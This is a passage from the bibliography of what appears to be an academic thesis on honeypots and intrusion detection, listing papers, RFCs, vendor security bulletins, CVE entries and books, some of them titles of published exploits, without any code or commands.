Note VU 497400. Published: November 2004. http://www.kb.cert.org/vuls/id/
497400, Retrieved: August 11, 2009
[CERT 2009] CERT (Editor): CERT Statistics. Published: February 2009. http:
//www.cert.org/stats/, Retrieved: August 11, 2009
[Chang 2002] Chang, Rocky K. C.: Defending against Flooding-Based Distributed
Denial-of-Service Attacks: A Tutorial. In: IEEE Communications Magazine 40
(2002), No. 10, p. 42–51
[Chantler 1995] Chantler, Alan N.: Risk: The Profile of the Computer Hacker, School
of Information Systems, Curtin Business School, (PHD Thesis), 1995
[Chiesa et al. 2009] Chiesa, Raoul ; Ciappi, Silvio ; Ducci, Stefania: Profiling
Hackers - The Science of Criminal Profiling as Applied to the World of Hacking.
Taylor & Francis Group, 2009
[Chung et al. 1995] Chung, Mandy ; Puketza, Nicholas ; Olsson, Ronald A. ;
Mukherjee, Biswanath: Simulating Concurrent Intrusions for Testing Intrusion
Detection Systems: Parallelizing Intrusions. In: Proceedings of the 1995 National
Information Systems Security Conference, 1995
[Comer 2000] Comer, Douglas E.: Internetworking with TCP/IP: Principles, Protocols,
and Architecture. 4th Edition. Prentice Hall, 2000
[Corey 2003] Corey, Joseph: Local Honeypot Identification. Published: 2003. http:
//www.ouah.org/p62-0x07.txt, Retrieved: August 11, 2009
[Corey 2004] Corey, Joseph: Advanced Honeypot Identification and Exploitation.
Published: 2004. http://www.ouah.org/p63-0x09.txt, Retrieved: August 11, 2009
[Craig and Burnett 2005] Craig, Paul ; Burnett, Mark: Software Piracy Exposed.
Syngress Publishing, 2005
[Creasy 1981] Creasy, Robert J.: The Origin of the VM/370 Time-Sharing System.
In: IBM Journal of Research and Development 25 (1981), No. 5, p. 483–490
[Criscuolo 2000] Criscuolo, Paul J.: Distributed Denial of Service.
Published: February 2000.
http://www.itsec.gov.cn/webportal/download/2000-CIAC-2319_Distributed_Denial_of_Service.pdf,
Retrieved: August 11, 2009
[Cross and Shinder 2008] Cross, Michael ; Shinder, Debra L.: Scene of the Cybercrime.
2nd Edition. Syngress Publishing, 2008
[Curran et al. 2005] Curran, Kevin ; Morrissey, Colman ; Fafan, Colm ; Murphy,
Colm ; O’Donnell, Brian ; Fitzpatrick, Gerry ; Condit, Stephen: Monitoring
Hacker Activity with a Honeynet. In: International Journal of Network Management
(2005), p. 123–134
[CVE 2003] CVE (Editor): CVE-2003-0466. Published: 2003. http://secunia.com/
advisories/cve_reference/CVE-2003-0466/, Retrieved: August 11, 2009
[CVE 2005] CVE (Editor): CVE-2005-0200. Published: 2005. http://cve.mitre.
org/cgi-bin/cvename.cgi?name=CVE-2005-0200, Retrieved: August 11, 2009
[CVE 2006a] CVE (Editor): CVE-2006-3392. Published: 2006. http://cve.mitre.
org/cgi-bin/cvename.cgi?name=CVE-2006-3392, Retrieved: August 11, 2009
[CVE 2006b] CVE (Editor): CVE-2006-6912. Published: 2006. http://secunia.
com/advisories/cve_reference/CVE-2006-6912/, Retrieved: August 11, 2009
[Dalheimer and Welsh 2005] Dalheimer, Matthias K. ; Welsh, Matt: Running Linux.
O’Reilly, 2005
[Danford 2006] Danford, Robert: 2nd Generation Honeyclients. Published: 2006.
http://handlers.dshield.org/rdanford/pub/Honeyclients_Danford_SANSfire06.pdf,
Retrieved: Apr 22, 2009
[Deloitte 2009] Deloitte (Editor): Losing Ground - TMT Global Security Survey. Published: 2009. http://www.deloitte.com/dtt/cda/doc/content/me_fsi_
281106_globalsecuritysurvey.pdf, Retrieved: August 11, 2009
[Dent 2002] Dent, Kyle D.: Postfix: The Definitive Guide. O’Reilly, 2002
[Dike 2006] Dike, Jeff: User Mode Linux. Prentice Hall, 2006
[DistroWatch 2007] DistroWatch (Editor): Linux Distributions - Facts and Figures.
Published: July 2007. http://distrowatch.com/stats.php?section=popularity,
[Dong-Hun 2003] Dong-Hun, You: Wu-FTPd v2.6.2 Off-by-One Remote 0day Exploit. Published: 2003. http://www.milw0rm.com/exploits/74, Retrieved: August 11, 2009
[Dornseif et al. 2004a] Dornseif, Maximillian ; Holz, Thorsten ; Klein, Christian:
NoSEBrEaK - Attacking Honeynets. In: Proceedings of the 5th Annual IEEE Information
Assurance Workshop, 2004
[Dornseif et al. 2004b] Dornseif, Maximillian ; Holz, Thorsten ; Klein, Christian N.:
NoSEBrEaK - Defeating Honeynets. Published: 2004. http://www.blackhat.
com/presentations/bh-usa-04/bh-us-04-holz/bh-us-04-holz-up.pdf,
[Dougherty and Robbins 1997] Dougherty, Dale ; Robbins, Arnold: Sed & Awk.
O’Reilly, 1997
[Ducea 2006] Ducea, Marius: Rotating Linux Log Files. Published: 2006. http://www.
ducea.com/2006/06/06/rotating-linux-log-files/, Retrieved: August 11, 2009
[Eckstein et al. 2007] Eckstein, Robert ; Watters, Paul A. ; Ts, Jay ; Carter,
Gerald: Using Samba. 3rd Edition. O’Reilly, 2007
[Eddy 2007] Eddy, Wesley M.: RFC: 4987 - TCP SYN Flooding Attacks and Common Mitigations. Published: 2007. http://www.ietf.org/rfc/rfc4987.txt, Retrieved: August 11, 2009
[Elnahrawy 2002] Elnahrawy, Eiman M.: Log-Based Chat Room Monitoring Using
Text Categorization: A Comparative Study. In: Proceedings of the
International Conference on Information and Knowledge Sharing, 2002
[Eurostats 2008] Eurostats (Editor): European Consumer Summit - Online Shopping
by Individuals in EU27. Published: 2008. http://epp.eurostat.ec.europa.eu,
[Farmer and Venema 2005] Farmer, Dan ; Venema, Wietse: Forensic Discovery.
Addison Wesley, 2005
[Feinstein and Peck 2007] Feinstein, Ben ; Peck, Daniel: Caffeine Monkey: Automated
Collection, Detection and Analysis of JavaScript. Published: 2007.
http://www.secureworks.com/research/blog/wp-content/uploads/bh-usa-07-feinstein_and_peck-WP.pdf,
Retrieved: August 11, 2009
[Fishbein and Ajzen 1975] Fishbein, Martin ; Ajzen, Icek: Belief, Attitude, Intention
and Behavior: An Introduction to Theory and Research. Addison Wesley, 1975
[Flenov 2005] Flenov, Michael: Hacker Linux Uncovered. A-LIST, 2005
[Floydman 2002] Floydman: ComLog.pl - A WIN32 Command Prompt Logger.
Published: 2002. http://www.geocities.com/floydian_99/comlog.html, Retrieved: August 11, 2009
[Fötinger and Ziegler 2004] Fötinger, Christian S. ; Ziegler, Wolfgang: Understanding
a Hacker's Mind - A Psychological Insight into the Hijacking of Identities. May 2004
[Franklin and Paxson 2007] Franklin, Jason ; Paxson, Vern: An Inquiry into the
Nature and Causes of the Wealth of Internet Miscreants. In: Proceedings of the 14th
ACM Conference on Computer and Communications Security, 2007
[Free Software Foundation 2007] Free Software Foundation (Editor): GNU General Public License. Published: 2007. http://www.gnu.org/licenses/gpl-3.0.
[Friedl 2006] Friedl, Jeffrey E. F.: Mastering Regular Expressions. O’Reilly, 2006
[Friedl 2002] Friedl, Steve: Best Practices for UNIX chroot() Operations.
Published: 2002. http://www.unixwiz.net/techtips/chroot-practices.html,
[FrozenTech 2004a] FrozenTech (Editor): What is Your Favorite Full-Featured
Desktop Live CD? Published: November 2004. http://www.livecdforums.com/
viewtopic.php?t=149, Retrieved: August 11, 2009
[FrozenTech 2004b] FrozenTech (Editor): What LiveCD has the Best Hardware Support? Published: November 2004. http://www.livecdforums.com/viewtopic.
php?t=153, Retrieved: August 11, 2009
[FrozenTech 2005a] FrozenTech (Editor): What is the Easiest LiveCD to Customize?
Published: July 2005. http://www.livecdforums.com/viewtopic.php?t=417, Retrieved: August 11, 2009
[FrozenTech 2005b] FrozenTech (Editor): What is Your Favorite PowerPC LiveCD?
Published: March 2005. http://www.livecdforums.com/viewtopic.php?t=313,
[Garfinkel et al. 2007] Garfinkel, Tal ; Adams, Keith ; Warfield, Andrew ;
Franklin, Jason: Compatibility is Not Transparency: VMM Detection Myths and
Realities. In: Proceedings of the 11th USENIX workshop on Hot topics in operating
systems, 2007
[Garland 2008] Garland, Jason: Wireshark - Secure Socket Layer (SSL). Published:
2008. http://wiki.wireshark.org/SSL, Retrieved: August 11, 2009
[GNU Free Software Foundation 2009] GNU Free Software Foundation (Editor):
Bash Reference Manual. Published: 2009. http://www.gnu.org/software/bash/
manual/bashref.html, Retrieved: August 11, 2009
[Göbel et al. 2006] Göbel, Jan ; Hektor, Jens ; Holz, Thorsten: Advanced Honeypot-Based
Intrusion Detection. In: The USENIX Magazine 31 (2006), December, No. 6,
p. 17–25
[Goebel et al. 2007] Goebel, Jan ; Holz, Thorsten ; Willems, Carsten: Measurement
and Analysis of Autonomous Spreading Malware in a University Environment. In: 4th
GI International Conference on Detection of Intrusions & Malware, and Vulnerability
Assessment, 2007
[Goldberg 1974] Goldberg, Robert P.: Survey of Virtual Machine Research. In: IEEE
Computer 7 (1974), No. 6, p. 34–45
[Gortmaker 2004] Gortmaker, Paul ; Linux Kernel Organization (Editor):
Using the RAM Disk Block Device with Linux. Published: October 2004.
http://www.kernel.org/doc/Documentation/blockdev/ramdisk.txt, Retrieved: August 11, 2009
[Hall 2005] Hall, Ronald J.: KDE Frequently Asked Questions: Description of the
Base Packages. Published: January 2005. http://docs.kde.org/development/en/
kdebase-runtime/faq/index.html, Retrieved: August 11, 2009
[Handelman et al. 1999] Handelman, Sigmund ; Stibler, Stephen ; Brownlee, Nevil
; Ruth, Gregory R.: RFC: 2724 - New Attributes for Traffic Flow Measurement.
Published: 1999. http://www.rfc-editor.org/rfc/rfc2724.txt, Retrieved: August 11, 2009
[Handley et al. 2001] Handley, Mark ; Paxson, Vern ; Kreibich, Christian: Network Intrusion Detection: Evasion, Traffic Normalization, and End-to-End Protocol
Semantics. In: Proceedings of the 10th conference on USENIX Security Symposium,
2001
[Handley and Rescorla 2006] Handley, Mark ; Rescorla, Eric: RFC: 4732 - Internet
Denial-of-Service Considerations. Published: November 2006.
http://www.rfc-editor.org/rfc/rfc4732.txt, Retrieved: August 11, 2009
[Hansen and Atkins 1993] Hansen, Stephen E. ; Atkins, Todd: Automated System
Monitoring and Notification With Swatch. In: Proceedings of the 7th USENIX Conference on System Administration, 1993, p. 145–152
[Henderson 2006] Henderson, Bryan: Introduction to Linux Loadable Kernel Modules. Published: 2006. http://tldp.org/HOWTO/Module-HOWTO/index.html, Retrieved: August 11, 2009
[Hollinger 1988] Hollinger, Richard C.: Computer Hackers Follow a Guttman-Like
Progression. In: Social Sciences Review 72 (1988), p. 199–200
[Holz 2005] Holz, Thorsten: A Short Visit to the Bot Zoo. In: IEEE Security & Privacy
3 (2005), No. 3, p. 76–79
[Holz 2006] Holz, Thorsten: Learning More About Attack Patterns With Honeypots.
In: Proceedings of Sicherheit - Schutz und Zuverlässigkeit, 2006
[Holz 2008] Holz, Thorsten: Collecting Malware - The Techniques Behind Nepenthes
& Mwcollect. Published: 2008. http://www.sitic.se/seminarium/sitic_vs2006/
nepenthes2.pdf, Retrieved: August 11, 2009
[Holz et al. 2006] Holz, Thorsten ; Marechal, Simon ; Raynal, Frederic: New
Threats and Attacks on the World Wide Web. In: IEEE Security & Privacy 4 (2006),
No. 2, p. 72–75
[Holz and Raynal 2005a] Holz, Thorsten ; Raynal, Frederic: Defeating Honeypots:
System Issues, Part 2. Published: 2005. http://www.securityfocus.com/infocus/
[Holz and Raynal 2005b] Holz, Thorsten ; Raynal, Frederic: Detecting Honeypots
and Other Suspicious Environments. In: Proceedings of the IEEE Workshop on Information Assurance and Security, 2005, p. 29–36
[Honeynet Project 2000a] Honeynet Project (Editor): Know Your Enemy: Motives. Published: 2000. http://old.honeynet.org/papers/motives/index.html,
[Honeynet Project 2000b] Honeynet Project (Editor): Know Your Enemy: The
Tools and Methodologies of the Script Kiddie. Published: 2000. http://old.
honeynet.org/papers/enemy/index.html, Retrieved: August 11, 2009
[Honeynet Project 2002a] Honeynet Project (Editor): Know Your Enemy: Learning
with User-Mode Linux. Published: 2002. http://old.honeynet.org/papers/uml/
index.html, Retrieved: August 11, 2009
[Honeynet Project 2002b] Honeynet Project (Editor): Know your Enemy: Passive Fingerprinting. Published: 2002. http://old.honeynet.org/papers/finger/,
[Honeynet Project 2003a] Honeynet Project (Editor): Know Your Enemy: A Profile. Published: 2003. http://old.honeynet.org/papers/profiles/cc-fraud.
pdf, Retrieved: August 11, 2009
[Honeynet Project 2003b] Honeynet Project (Editor): Know Your Enemy: Defining
Virtual Honeynets. Published: 2003. http://old.honeynet.org/papers/virtual/
index.html, Retrieved: August 11, 2009
[Honeynet Project 2003c] Honeynet Project (Editor): Know Your Enemy: Sebek.
Published: 2003. http://old.honeynet.org/papers/sebek.pdf, Retrieved: August 11, 2009
[Honeynet Project 2004a] Honeynet Project (Editor): Honeynet Definitions, Requirements, and Standards. Published: 2004. http://old.honeynet.org/alliance/
requirements.html, Retrieved: August 11, 2009
[Honeynet Project 2004b] Honeynet Project (Editor): Know your Enemy - Learning
about Security Threats. Addison Wesley, 2004
[Honeynet Project 2004c] Honeynet Project (Editor): Know Your Enemy: Honeynets in Universities. Published: 2004. http://old.honeynet.org/papers/edu/,
[Honeynet Project 2005a] Honeynet Project (Editor): Honeywall Configuration
File. Published: 2005. http://yum.honeynet.org/roo/manual/txt/honeywall.
conf, Retrieved: August 11, 2009
[Honeynet Project 2005b] Honeynet Project (Editor): Honeywall Initial Tripwire
Setup. Published: 2005. http://yum.honeynet.org/roo/manual/txt/tripwire.
txt, Retrieved: August 11, 2009
[Honeynet Project 2005c] Honeynet Project (Editor): Honeywall System Clock Information. Published: 2005. http://yum.honeynet.org/roo/manual/txt/clock.
txt, Retrieved: August 11, 2009
[Honeynet Project 2005d] Honeynet Project (Editor): Know Your Enemy: Honeywall
CDROM Roo. Published: 2005. http://old.honeynet.org/papers/cdrom/roo/index.html,
Retrieved: August 11, 2009
[Honeynet Project 2005e] Honeynet Project (Editor): Know Your Enemy: GenII
Honeynets. Published: 2005. http://old.honeynet.org/papers/gen2/index.
[Honeynet Project 2006] Honeynet Project (Editor): Know Your Enemy: Honeynets. Published: 2006. http://old.honeynet.org/papers/honeynet/index.
[Honeynet Project 2007] Honeynet Project (Editor): Roo - Online User Manual.
Published: 2007. http://old.honeynet.org/tools/cdrom/roo/manual/index.
[iDefense 2005] iDefense (Editor): Tikiwiki Command Injection Vulnerability.
Published: 2005. http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=335,
Retrieved: August 11, 2009
[Ikinci et al. 2008] Ikinci, Ali ; Holz, Thorsten ; Freiling, Felix: Monkey-Spider:
Detecting Malicious Websites with Low-Interaction Honeyclients. In: Gesellschaft für
Informatik: Sicherheit 2008, 2008
[Internet Assigned Numbers Authority (IANA) 2008] Internet Assigned Numbers
Authority (IANA) (Editor): Port Numbers. Published: 2008. http://www.iana.
org/assignments/port-numbers, Retrieved: August 11, 2009
[Ithilgore 2008] Ithilgore: Hacking Bash History. Published: July 2008. http:
//sock-raw.org/papers/bash_history, Retrieved: August 11, 2009
[Itzel 2007] Itzel, Laura A.: Eine Infrastruktur zur Einschätzung des aktuellen
Gefährdungslevels durch Malware (German), University of Mannheim, Diploma Thesis, 2007.
http://pi1.informatik.uni-mannheim.de/filepool/theses/diplomarbeit-2007-itzel.pdf
[Jestrix 2003] Jestrix: An Introduction to psyBNC. Published: 2003. http:
//old.honeynet.org/scans/scan28/sol/5/mirror/psyBNC.htm, Retrieved: August 11, 2009
[Joachims 2002] Joachims, Thorsten: Learning to Classify Text Using Support Vector
Machines - Methods, Theory, and Algorithms. Kluwer Academic Publishers, 2002
[Jones 2006a] Jones, M. T. ; IBM DeveloperWorks (Editor): Inside the Linux
Boot Process. Published: May 2006. http://www.ibm.com/developerworks/linux/
library/l-linuxboot/, Retrieved: August 11, 2008
[Jones 2006b] Jones, M. T. ; IBM DeveloperWorks (Editor): Linux Initial RAM
Disk (initrd) Overview. Published: 2006. http://www.ibm.com/developerworks/
linux/library/l-initrd.html, Retrieved: August 11, 2009
[Jordan 2006] Jordan, Michael J.: Top Linux Live CD Distributions 2006.
Published: May 2006. http://www.linux.org/dist/reviews/livecd_2006.html,
[Jordan and Taylor 1998] Jordan, Tim ; Taylor, Paul: A Sociology of Hackers. In:
The Sociological Review 46 (1998), No. 4, 757-780. http://www.isoc.org/inet98/
proceedings/2d/2d_1.htm
[Jung et al. 2004] Jung, Jaeyeon ; Paxson, Vern ; Berger, Arthur W. ; Balakrishnan, Hari: Fast Portscan Detection Using Sequential Hypothesis Testing. In:
Proceedings of the IEEE Symposium on Security and Privacy, 2004
[Kacper 2006] Kacper: TR Newsportal - Remote File Include. Published: 2006.
http://milw0rm.com/exploits/1789, Retrieved: August 11, 2009
[Keong 2004] Keong, Tan C.: Win2K/XP SDT Restore 0.2. Published: 2004. http:
//www.security.org.sg/code/sdtrestore.html, Retrieved: August 11, 2009
[Kim and Karp 2004] Kim, Hyang-Ah ; Karp, Brad: Autograph: Toward Automated,
Distributed Worm Signature Detection. In: Proceedings of the 13th Conference on
USENIX Security Symposium, 2004, p. 271–286
[Klein 1990] Klein, Daniel V.: “Foiling the Cracker”: A Survey of, and Improvements
to, Password Security. In: Proceedings of the Second USENIX Workshop on Security,
1990
[Knorr 2009] Knorr, Gerd: The VESA Frame Buffer Device. Published: 2009.
http://www.kernel.org/doc/Documentation/fb/vesafb.txt, Retrieved: August 11, 2009
[Koziol et al. 2004] Koziol, Jack ; Litchfield, David ; Aitel, Dave ; Anley, Chris ;
Eren, Sinan ; Mehta, Neel ; Hassell, Riley: The Shellcoder’s Handbook: Discovering and Exploiting Security Holes. Wiley & Sons, 2004
[Kreibich and Crowcroft 2004] Kreibich, Christian ; Crowcroft, Jon: Honeycomb
- Creating Intrusion Detection Signatures Using Honeypots. In: ACM SIGCOMM
Computer Communication Review 34 (2004), No. 1, p. 51–56
[Kroah-Hartman 2006] Kroah-Hartman, Greg: Linux Kernel in a Nutshell. O’Reilly,
2006
[Leckie and Kotagiri 2002] Leckie, Christopher ; Kotagiri, Ramamohanarao: A
Probabilistic Approach to Detecting Network Scans. In: Network Operations and
Management Symposium, 2002
[Levchenko et al. 2004] Levchenko, Kirill ; Paturi, Ramamohan ; Varghese, George:
On the Difficulty of Scalably Detecting Network Attacks. In: Proceedings of the 11th
ACM Conference on Computer and Communications Security, 2004
[Li et al. 2006] Li, Zhichun ; Sanghi, Manan ; Chen, Yan ; Kao, Ming-Yang ; Chavez,
Brian: Hamsa: Fast Signature Generation for Zero-day Polymorphic Worms with
Provable Attack Resilience. In: Proceedings of the 2006 IEEE Symposium on Security
and Privacy, 2006, p. 32–47
[Linux Kernel Organization 2008] Linux Kernel Organization (Editor): The
Linux Kernel Archives. Published: 2008. http://www.kernel.org/, Retrieved: August 11, 2009
[Linux Kernel Organization 2009] Linux Kernel Organization (Editor): Kernel Parameters. Published: 2009. http://www.kernel.org/doc/Documentation/
kernel-parameters.txt, Retrieved: August 11, 2009
[Liu and Cheng 2009] Liu, Simon ; Cheng, Bruce: Cyberattacks: Why, What, Who,
and How. In: IT Professional 11 (2009), No. 3, p. 14–21
[Lougher and Okajima 2008] Lougher, Phillip ; Okajima, Junjiro: Squashfs LZMA.
Published: March 2008. http://www.squashfs-lzma.org/, Retrieved: August 11,
2008
[Lucks 1998] Lucks, Stefan: Attacking Triple Encryption. In: Proceedings of the 5th
International Workshop on Fast Software Encryption Vol. 1372, 1998, p. 239–253
[Madsys 2003] Madsys: Finding Hidden Kernel Modules. In: Phrack Magazine 61
(2003), No. 6
[Manning et al. 2008] Manning, Christopher D. ; Raghavan, Prabhakar ; Schütze,
Hinrich: An Introduction to Information Retrieval. Cambridge University Press, 2008
[Matejicek 2008a] Matejicek, Tomas: Boot Parameters in Slax. Published: 2008.
http://www.slax.org/documentation_boot_cheatcodes.php,
[Matejicek 2008b] Matejicek, Tomas: Linux Live Scripts. Published: 2008. http:
//www.linux-live.org/, Retrieved: August 11, 2009
[Mates 2008] Mates, Jeremy: OpenSSH Public Key Authentication. Published:
October 2008. http://sial.org/howto/openssh/publickey-auth/, Retrieved: August 11, 2009
[Mazzariello 2008] Mazzariello, Claudio: IRC Traffic Analysis for Botnet Detection.
In: Proceedings of the 2008 The Fourth International Conference on Information Assurance and Security, 2008
[McCarty 2003] McCarty, Bill: Automated Identity Theft. In: IEEE Security &
Privacy 1 (2003), No. 5, p. 89–92
[McClure et al. 2005] McClure, Stuart ; Scambray, Joel ; Kurtz, George: Hacking
Exposed: Network Security Secrets & Solutions. 5th Edition. McGraw-Hill, 2005
[Microsoft Corporation 2002] Microsoft Corporation (Editor): Microsoft Security Bulletin MS02-039. Published: 2002. http://www.microsoft.com/technet/
security/bulletin/MS02-039.mspx, Retrieved: August 11, 2009
[Microsoft Corporation 2003a] Microsoft Corporation (Editor): Microsoft Security Bulletin MS03-007. Published: 2003. http://www.microsoft.com/technet/
[Microsoft Corporation 2003b] Microsoft Corporation (Editor): Microsoft Security Bulletin MS03-039. Published: 2003. http://www.microsoft.com/technet/
[Microsoft Corporation 2004a] Microsoft Corporation (Editor): Disabling Messenger Service in Windows XP. Published: Jan 2004. http://www.microsoft.
com/windowsxp/using/security/learnmore/stopspamv45.mspx, Retrieved: August 11, 2009
[Microsoft Corporation 2004b] Microsoft Corporation (Editor): Microsoft Security Bulletin MS04-007. Published: 2004. http://www.microsoft.com/technet/
security/bulletin/ms04-007.mspx, Retrieved: August 11, 2009
[Microsoft Corporation 2004c] Microsoft Corporation (Editor): Microsoft Security Bulletin MS04-011. Published: 2004. http://www.microsoft.com/technet/
[Microsoft Corporation 2009] Microsoft Corporation (Editor): Understanding User-Agent Strings. Published: 2009. http://msdn.microsoft.com/en-us/library/ms537503.aspx, Retrieved: August 11, 2009
[Miniwatts Marketing Group 2008] Miniwatts Marketing Group (Editor): Internet Users in the World - Growth 1995-2010. Published: 2008. http://www.
internetworldstats.com/emarketing.htm, Retrieved: August 11, 2009
[Mirkovic and Reiher 2004] Mirkovic, Jelena ; Reiher, Peter: A Taxonomy of DDoS
Attack and DDoS Defense Mechanisms. In: ACM SIGCOMM Computer Communication Review 34 (2004), No. 2, p. 39–53
[Mokube and Adams 2007] Mokube, Iyatiti ; Adams, Michele: Honeypots: Concepts,
Approaches, and Challenges. In: Proceedings of the 45th Annual Southeast Regional
Conference, ACM Press, 2007, p. 321–326
[Mölsä 2005] Mölsä, Jarmo: Mitigating Denial of Service Attacks: A Tutorial. In:
Journal of Computer Security 13 (2005), No. 6, p. 807–837
[Moore et al. 2003] Moore, David ; Paxson, Vern ; Savage, Stefan ; Shannon,
Colleen ; Staniford, Stuart ; Weaver, Nicholas: Inside the Slammer Worm. In:
IEEE Security & Privacy 1 (2003), July, No. 4
[Moore et al. 2006] Moore, David ; Shannon, Colleen ; Brown, Douglas J. ;
Voelker, Geoffrey M. ; Savage, Stefan: Inferring Internet Denial-of-Service Activity. In: ACM Transactions on Computer Systems 24 (2006), No. 2, p. 115–139
[Mozilla Developer Center 2009] Mozilla Developer Center (Editor): User Agent
Strings Reference. Published: 2009. https://developer.mozilla.org/en/User_
Agent_Strings_Reference, Retrieved: August 11, 2009
[National Institute of Standards and Technology 1996] National Institute of
Standards and Technology (Editor): An Introduction to Computer Security:
The NIST Handbook. Published: 1996. http://csrc.nist.gov/publications/
nistpubs/800-12/handbook.pdf, Retrieved: August 11, 2009
[Negus 2007] Negus, Christopher: Live Linux CDs - Building and Customizing Bootables. Prentice Hall PTR, 2007
[Net Applications 2009] Net Applications (Editor): Operating System Market Share. Published: January 2009.
http://marketshare.hitslink.com/operating-system-market-share.aspx, Retrieved: August 11, 2009
[NETSEC 2009] NETSEC (Editor): Specter - Intrusion Detection System. Published:
2009. http://www.specter.com/, Retrieved: August 11, 2009
[Newsome et al. 2005] Newsome, James ; Karp, Brad ; Song, Dawn: Polygraph:
Automatically Generating Signatures for Polymorphic Worms. In: Proceedings of the
2005 IEEE Symposium on Security and Privacy, 2005, p. 226–241
[NIST 1999] NIST (Editor): National Institute of Standards and Technology: Data
Encryption Standard. Published: 1999. http://csrc.nist.gov/publications/
fips/fips46-3/fips46-3.pdf, Retrieved: August 11, 2009
[NIST 2001] NIST (Editor): National Institute of Standards and Technology: Advanced Encryption Standard (AES). Published: 2001. http://csrc.nist.gov/
publications/fips/fips197/fips-197.pdf, Retrieved: August 11, 2009
[NIST 2008] NIST (Editor): NSRL - National Software Reference Library. Published:
2008. http://www.nsrl.nist.gov/, Retrieved: August 11, 2009
[OpenSSL Project 2003] OpenSSL Project (Editor): RSA key processing tool.
Published: January 2003. http://www.openssl.org/docs/apps/rsa.html, Retrieved: August 11, 2009
[Orebaugh et al. 2007] Orebaugh, Angela ; Ramirez, Gilbert ; Burke, Josh ; Pesce,
Larry ; Wright, Joshua ; Morris, Greg: Wireshark & Ethereal Network Protocol
Analyzer Toolkit. Syngress Publishing, 2007
[Östling 2006] Östling, Andreas: Oinkmaster Documentation. Published: January 2006.
http://oinkmaster.sourceforge.net/readme.shtml, Retrieved: August 11, 2009
[Osvik et al. 2006] Osvik, Dag A. ; Shamir, Adi ; Tromer, Eran: Cache Attacks and
Countermeasures: The Case of AES. In: RSA Conference, 2006, p. 1–20
[Paola 2006] Paola, Stefano D.: MySql COM TABLE DUMP Memory Leak & MySql Remote B0f. Published: 2006.
http://downloads.securityfocus.com/vulnerabilities/exploits/my_com_table_dump_exploit.c, Retrieved: August 11, 2009
[Parmelee et al. 1972] Parmelee, R. P. ; Peterson, T. I. ; Tillman, C. C. ; Hatfield, D. J.: Virtual Storage and Virtual Machine Concepts. In: IBM Systems
Journal 11 (1972), No. 2, p. 99–130
[Paxson 1998] Paxson, Vern: Bro: A System for Detecting Network Intruders in Real-Time. In: 7th USENIX Security Symposium, 1998
[Paxson et al. 1998] Paxson, Vern ; Almes, Guy ; Mahdavi, Jamshid ; Mathis,
Mark M.: RFC: 2330 - Framework for IP Performance Metrics. Published: 1998.
ftp://ftp.isi.edu/in-notes/rfc2330.txt, Retrieved: August 11, 2009
[Peng et al. 2007] Peng, Tao ; Leckie, Christopher ; Ramamohanarao, Kotagiri:
Survey of Network-Based Defense Mechanisms Countering the DoS and DDoS Problems. In: ACM Computing Surveys 39 (2007), No. 1
[Perens 1998] Perens, Bruce: The Open Source Definition. Published: 1998. http:
//perens.com/Articles/OSD.html, Retrieved: August 11, 2009
[Perlman 1999] Perlman, Radia: Interconnections. Bridges and Routers. 2nd Edition.
Addison Wesley, 1999
[Pointer 1997] Pointer, Robey: Eggdrop - Main Documentation. Published: 1997.
http://www.eggheads.org/support/egghtml/1.6.19/, Retrieved: August 11, 2009
[Pols 2007] Pols, Dr. A. ; Bundesverband Informationswirtschaft, Telekommunikation und neue Medien e.V. (Editor): E-Commerce 2006. Published: 2007.
http://www.bitkom.org/de/presse/8477_43665.aspx, Retrieved: August 11, 2009
[Postel 1980] Postel, Jonathan: RFC: 768 - User Datagram Protocol. Published:
1980. http://www.faqs.org/rfcs/rfc768.html, Retrieved: August 11, 2009
[Postel 1981a] Postel, Jonathan: RFC: 792 - Internet Control Message Protocol. Published: 1981. http://www.faqs.org/rfcs/rfc792.html, Retrieved: August 11, 2009
[Postel 1981b] Postel, Jonathan: RFC: 791 - Internet Protocol. Published: 1981.
http://www.faqs.org/rfcs/rfc791.html, Retrieved: August 11, 2009
[Postel 1981c] Postel, Jonathan: RFC: 793 - Transmission Control Protocol. Published: 1981. http://www.faqs.org/rfcs/rfc793.html, Retrieved: August 11, 2009
[Pouget et al. 2005] Pouget, Fabien ; Dacier, Marc ; Pham, Van H.: Leurre.com:
On the Advantages of Deploying a Large Scale Distributed Honeypot Platform. In:
Proceedings of the E-Crime and Computer Conference, 2005
[Provos 2004] Provos, Niels: A Virtual Honeypot Framework. In: Proceedings of the
13th USENIX Security Symposium, 2004
[Provos and Holz 2007] Provos, Niels ; Holz, Thorsten: Virtual Honeypots: From
Botnet Tracking to Intrusion Detection. Addison Wesley, 2007
[Ptacek and Newsham 1998] Ptacek, Thomas H. ; Newsham, Timothy N.: Insertion,
Evasion, and Denial of Service: Eluding Network Intrusion Detection. Published:
1998. http://insecure.org/stf/secnet_ids/secnet_ids.html, Retrieved: August 11, 2009
[QoSient 2006] QoSient (Editor): Argus Flow Models. Published: 2006. http:
//www.qosient.com/argus/flow.htm, Retrieved: August 11, 2009
[Raymond 2003] Raymond, Eric S.: The Jargon File, Version 4.4.7. Published:
December 2003. http://www.catb.org/jargon/, Retrieved: August 11, 2009
[Rhino Software 2004] Rhino Software (Editor): How Did Serv-U Get Installed
on My Computer? Published: 2004. http://www.serv-u.com/suvirushack.asp,
[Richardson 2008] Richardson, Robert ; Computer Security Institute (Editor):
CSI Computer Crime & Security Survey 2008. Published: 2008. http://i.cmpnet.
com/v2.gocsi.com/pdf/CSIsurvey2008.pdf, Retrieved: August 11, 2009
[Riden et al. 2007] Riden, Jamie ; McGeehan, Ryan ; Engert, Brian ; Mueter,
Michael: Know your Enemy: Web Application Threats. Published: February 2007.
http://www.honeynet.org/papers/webapp/, Retrieved: August 11, 2009
[Rogers 2000a] Rogers, Marc: A New Hacker Taxonomy. Published: 2000. http:
//homes.cerias.purdue.edu/~mkr/hacker.doc, Retrieved: August 11, 2009
[Rogers 2000b] Rogers, Marc: Psychological Theories of Crime and “Hacking”. Published: 2000. http://homes.cerias.purdue.edu/~mkr/crime.doc, Retrieved: August 11, 2009
[Rogers 2001] Rogers, Marc: A Social Learning Theory and Moral Disengagement
Analysis of Criminal Computer Behavior: An Exploratory Study, University of Manitoba, Winnipeg, Manitoba, (PhD Thesis), August 2001.
http://homes.cerias.purdue.edu/~mkr/cybercrime-thesis.pdf
[Rogers 2005] Rogers, Marc: The Development of a Meaningful Hacker Taxonomy:
A Two Dimensional Approach. In: CERIAS Tech Report 2005 (2005), July, No. 43.
https://www.cerias.purdue.edu/assets/pdf/bibtex_archive/2005-43.pdf
[Rowe and Pierce 1982] Rowe, Michael D. ; Pierce, Barbara L.: Sensitivity of the
